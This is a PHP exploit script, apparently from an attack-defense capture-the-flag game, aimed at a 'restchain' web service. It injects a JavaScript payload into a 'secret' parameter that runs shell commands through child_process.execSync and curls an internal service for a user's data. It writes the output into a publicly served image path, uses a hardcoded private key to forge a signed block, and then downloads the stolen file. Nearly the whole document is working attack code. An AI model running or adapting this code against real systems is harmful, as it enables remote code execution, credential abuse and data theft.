<?php
function http($uri, $method = "GET", $headers = "", $data = false, $postfile = false, $addParams = false) {
  static $cr = NULL;

  if ($cr === NULL) {
    $cr = curl_init();
    curl_setopt_array($cr, array(CURLOPT_HEADER => 1,
                                 CURLOPT_RETURNTRANSFER => 1,
                                 CURLOPT_SSL_VERIFYPEER => 0,
                                 CURLOPT_SSL_VERIFYHOST => 0,
                                 CURLOPT_COOKIEFILE => "",
                           ));
  }

  curl_setopt($cr, CURLOPT_POST, (strtoupper($method) == "POST" ? 1 : 0));
  curl_setopt($cr, CURLOPT_URL, $uri);

  if ($data !== false) {
    if ($postfile) {
      $arr = array();
      foreach (explode("&", $data) as $pd) {
        list ($key, $val) = explode("=", $pd, 2);
        if ($val[0] == '@') {
         $arr[$key] = curl_file_create(substr($val, 1));
        } else {
         $arr[$key] = $val;
        }
      }
      curl_setopt($cr, CURLOPT_POSTFIELDS, $arr);
    } else {
     curl_setopt($cr, CURLOPT_POSTFIELDS, $data);
    }
  }
  curl_setopt($cr, CURLOPT_NOBODY, strtoupper($method) == "HEAD");
  curl_setopt($cr, CURLOPT_CUSTOMREQUEST, $method);
  curl_setopt($cr, CURLOPT_HTTPHEADER, explode("\r\n", trim($headers)));

  if (is_array($addParams)) {
    curl_setopt_array($cr, $addParams);
  }

  $res = curl_exec($cr);

  return $res;
}

$fp = [
  '10.66.115.2' => "789c337aafbf2bfe6cb69640aad59cac95f9318a319e2ee1903a5efca082e7404c316ef8cbf9f7521d60b248f73e46a6d87a38f82aa704f56a8b99a66525db83c50fbd45e3c587039792f9c604bbc9198f55357725bc106703efc69ea4a32d685192e64e264144b5eca982af411a4a8a497e27961c499bda82ad7b1be1c5cea5d3d2d717d9ded234013e459246ff08bf7214937d86c68b122162cdde845093f36b0198f907cf08982ba9a15bc3437a955461e550b823e305ed35c4c759696498edf644e68d7956e491f8ae083c3cd11368b44b34a9258b5be0685144bcc2ad68e2fa20655ea24c46a1003175406d7eade7939f941543f40e3de9534a26aecc78",
  '10.66.100.2' => "19475196a76a0815bb0fd6203badf265c7e5413d476575f91556ce0f59221da4d59a06665cdbe75c98bccaca9c4bff6fe0af7542d59158f0152a330de053855c471c0fa373a36b8318c0fdbd1e4ea7514408154ed6664a6ae2b38b863ea25dce7f9861ca89261a80639aadf77d42aa5ce382b3e5f799597c41b7baf6e4f1ba0a218618f08cb8017655699ad19c9e27127e263c29bcd0849108a1a54c0c617dc5699210c77e568dd8ddaebf2029f32a7024b29fa307382a5fc6fbdb0f84ab96d59c0cabffce1154f59bff174142a1d9e23b6f454660fae2919e310e09c2a1db5a3d51052dcedddd855ea7d3822c7fe66dfbfdaa0edd3ad36ddf2c2495622e21f7",
  '10.66.141.2' => "5b239684d05c7bb57c80afad0758a46e1442a89fa90fbc723dd0e536a4a131ae80a96d05ce0e3ebcde4ccf22be2c20665b7cccf02f4b0721ff2411008105ab4efe416cb259d1fc70e13017fd96561248e9e60253fe59d6c495b277271e83c265c69d92c8aacebf12131caa9da4a573eb47504279b8bc76eb4da6231aebd1f041b35c559039940f7f8e838f4c1a6bd066ad0bb2d647085b6ed976c9ca668e6831ada23ac572489bed6ada376c781df333d344cea0668c79081f4209a98b18c064d8a28d294885352a7b14e961405d6c778831ea93ae26c6db64986f8d89fb5411b80e896f207524f2c0b14ae2b75a2f976d75ff86fdf6a5711f2e1891e19ca4cd",
  '10.66.58.2' => "940f9ff6f0d6d1532d2caa0ae487eef3e9293df9145dbbffbcb0264dbe2828756b663e79bf9597d1710c97c6a7b836d7741f972c1c28343e2d78806e71cbf4d11f087cabdc73a1b3617f79df7fb7646c0f9d25b1f188a7b5ec60e3e09c980fcff1271127aefc5ae9757119e9cea23f51eafef3828957628f14c630bd9f9a616d7e1ab852e1bbefc40a5e25b6edb39ad59f89dd9ac3f5cab8068349f2db1aaa7e502438a28d0ea97689e1021650bb794556be1a6e64c0c8cf16029f3dbdf68c56e3a39a54e60d801730790787f9ded67e041faa3e72f02eefc407c4dccae13acc051a62669daea3064cfadd12d0c2131ebed49a9070a6d64f70c63c741d24d1b2",
];

$sp = [
  '10.66.115.2' => "b34eb256adc3f6c5bda1a8b272522d30cf3882a9bc4fe6581be350b8c7c68ad513558bae0455fd30ac0b72f59fdd6c07f9cf80682d5ac8aab800e2074a7fdaaefe01bf96b46ba91615f2d94193a6b04ce4a5b902849de7987aebb143d4f5afa838219184134048902de30a8d49a675fee8e7043291d847584360876a8145b3fda6eb5a099ff8aa5e62c7949c5edd999874359f19ea169ad991fe565ba0323f472f3bdfaa611305ff3bc0654e93dbf5c04b27e4767114caaada101cf8aeb320917d1283d26a222eb39559b024630de0da65af083b05fffb5615a3aa812a4e375cde9ccf5341ef3905b501c8187cc0d1b61b1e51dec6a21507595ec6962b77ce76",
  '10.66.100.2' => "b34eb256adc3f6c5bda1a8b272522d30cf3882a9bc4fe6581be350b8c7c68ad513558bae0455fd30ac0b72f59fdd6c07f9cf80682d5ac8aab800e2074a7fdaaefe01bf96b46ba91615f2d94193a6b04ce4a5b902849de7987aebb143d4f5afa838219184134048902de30a8d49a675fee8e7043291d847584360876a8145b3fda6eb5a099ff8aa5e62c7949c5edd999874359f19ea169ad991fe565ba0323f472f3bdfaa611305ff3bc0654e93dbf5c04b27e4767114caaada101cf8817f9c6bca5a106ef5efc958886897773be9a18664976e9eeb2ac525ac14f088bd5e05cfe9e7ec374d9f63c1a33007f3cc72588a08cb468c66303ea5d5272591aae3aa94",
  '10.66.141.2' => "b34eb256adc3f6c5bda1a8b272522d30cf3882a9bc4fe6581be350b8c7c68ad513558bae0455fd30ac0b72f59fdd6c07f9cf80682d5ac8aab800e2074a7fdaaefe01bf96b46ba91615f2d94193a6b04ce4a5b902849de7987aebb143d4f5afa838219184134048902de30a8d49a675fee8e7043291d847584360876a8145b3fda6eb5a099ff8aa5e62c7949c5edd999874359f19ea169ad991fe565ba0323f472f3bdfaa611305ff3bc0654e93dbf5c04b27e4767114caaada101cf8aeb320917d1252b139c166624e811401719fff000aececbbff39809b6ea83da5cebb376c619d48fabea053ff4f8627010d869671480815ad1b061bb803299cb40c5cc100",
  '10.66.58.2' => "b34eb256adc3f6c5bda1a8b272522d30cf3882a9bc4fe6581be350b8c7c68ad513558bae0455fd30ac0b72f59fdd6c07f9cf80682d5ac8aab800e2074a7fdaaefe01bf96b46ba91615f2d94193a6b04ce4a5b902849de7987aebb143d4f5afa838219184134048902de30a8d49a675fee8e7043291d847584360876a8145b3fda6eb5a099ff8aa5e62c7949c5edd999874359f19ea169ad991fe565ba0323f472f3bdfaa611305ff3bc0654e93dbf5c04b27e4767114caaada101cf8aeb320917d12867d764dcf5b4898d93a0382428f233405202ba40685c0c0a6c748073210f65fde48ced5104c022aacb50a471998be5d302d8bf5e182e4f6d1017cd30d97",
];


$ip = $argv[1];

$flagName = substr(md5(microtime() . mt_rand()), 0, 16);

$payload = "'+(String(require('child_process').execSync('curl -s \\'http://127.0.0.66:9998/get?user=" . $argv[2] . "\\' -H \\'Accept-Encoding: gzip\\' -H \\'User-Agent: haskell wreq-0.5.2.1\\' -H \\'Authentication: {\"V\":\"" . $fp[$ip] . "\",\"r\":\"" . $sp[$ip] . "\"}\\' | /srv/restchain/bin/restchain-persist /srv/restchain/data/public/images/$flagName.png')))+'";
$res = http("http://$ip:6060/api/acl/require-secret?secret=" . urlencode($payload));
list (, $res) = explode("\r\n\r\n", $res, 2);
echo "$res\n\n";

$signed_token = trim($res);


$blockNonce = hash('sha256', mt_rand() . microtime());
$postNonce = hash('sha256', mt_rand() . microtime());

$hdrs = "X-Restchain-Private-Key: Rom0VuFYmnyKumMergKV3K8leZ8Nc5Q6TAMGvCSleZyz1u+B4Ec/IFr7oOOgbnbhET9x4MyxcEzT7A2BpK8ZtQ==\r\n"
      . "X-Restchain-Block-Nonce: " . $blockNonce . "\r\n"
      . "X-Restchain-Block-Acl: " . $signed_token . "\r\n";
$res = http("http://$ip:6060/api/crypto/sign", "POST", $hdrs, $postNonce);
echo "$res\n\n";

if (!preg_match('#(X-Restchain-Signature: \S+)#s', $res, $mt)) {
    exit("no sig\n");
}
$hdrs .= $mt[1] . "\r\n";


$hdrs .= "X-Restchain-Previous: 6666666666666666666666666666666666666666666666666666666666666666\r\n"
       . "X-Restchain-Signer: s9bvgeBHPyBa+6DjoG524RE/ceDMsXBM0+wNgaSvGbU=\r\n";
$res = http("http://$ip:6060/api/block", "PUT", $hdrs, $postNonce);
echo "$res\n\n";


if (!preg_match('#X-Restchain-Id: (\w+)#s', $res, $mt)) {
    exit("no block id\n");
}
$blockId = $mt[1];

$res = http("http://$ip:6060/api/block/$blockId", "GET", $hdrs);
echo "$res\n\n";


echo http("http://$ip:6060/images/$flagName.png") . "\n\n";